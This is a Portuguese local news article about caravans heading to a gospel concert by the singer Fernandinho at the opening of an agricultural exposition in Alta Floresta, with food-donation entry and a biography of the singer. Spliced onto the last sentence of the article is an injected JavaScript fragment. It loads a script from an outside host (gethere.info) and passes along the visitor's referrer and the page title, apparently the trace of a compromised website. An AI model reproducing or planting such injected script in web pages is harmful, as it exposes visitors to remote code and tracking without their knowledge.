Capa / Cidades / Caravanas começam a se movimentar para assistir show de Fernandinho

Caravanas começam a se movimentar para assistir show de Fernandinho

FernandinhoDa Redação

O presidente do Sindicato Rural de Alta Floresta, Celso Bevilaqua mostrou empolgação ao comentar sobre vários contatos que recebeu de pessoas na região que estariam se mobilizando para acompanhar, no dia 24 de maio, o show do cantor gospel Fernandinho, que se apresentará na abertura da Exposição deste ano. No dia da abertura, a entrada para o parque de exposições será um quilo de alimento não perecível, que serão destinados à entidades assistenciais de Alta Floresta, Paranaíta e Carlinda. “Nós vamos ter que fazer um local lá para estacionar vans e ônibus, tem caravanas de todas as cidades vindo”, disse empolgado o presidente.
A abertura da exposição deste ano será potencialmente beneficente, além de arrecadar alimentos, que serão destinados às cidades de Alta Floresta, Paranaíta e Carlinda, os diretores do Sindicato Rural também irão realizar uma campanha para arrecadação de fraldas descartáveis e leite para ser destinado à Pinardi, que além de funcionar como creche, também faz o abrigo de crianças abandonadas. A ideia acrescentar as fraldas e o leite em pó dentre os itens que poderão ser trocados por entrada para o dia do show do cantor Fernandinho.
Sobre o cantor: Fernando Jerônimo dos Santos Júnior, conhecido popularmente como Fernandinho é um cantor brasileiro de música gospel, compositor, multi-instrumentista, arranjador, produtor musical e pastor evangélico. Iniciou sua carreira em 2001, com o álbum de estúdio Formoso És, mas alcançou notoriedade nacional com o disco Faz Chover, lançado em 2003 e que rendeu indicações ao Troféu Talento. Anos depois, em 2009 lançou Uma Nova História, um dos trabalhos mais bem sucedidos do músico em vendas, alcançando cerca de duzentas e cinquenta mil cópias vendidas, em 2011 lançou o álbum Sou Feliz que recebeu recentemente o Disco de platina tripla. Em agosto de 2012, lançou o CD Teus Sonhos e em março de 2013 gravou o DVD no HSBC Arena, na Barra da Tijuca, no Rio de Janeiro. Em 2014 Fernandinho lançou o seu mais novo trabalho o CD Fernandinho Acústico que em menos de duas semanas já era disco de ouro, Fernandinho vendeu aproximadamente 2 milhões de cópias na sua carreira.
Atualmente é considerado como uns dos cantores evangélicos de maior sucesso a nível nacional, tanto em vendas quanto em visualizações na internet.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top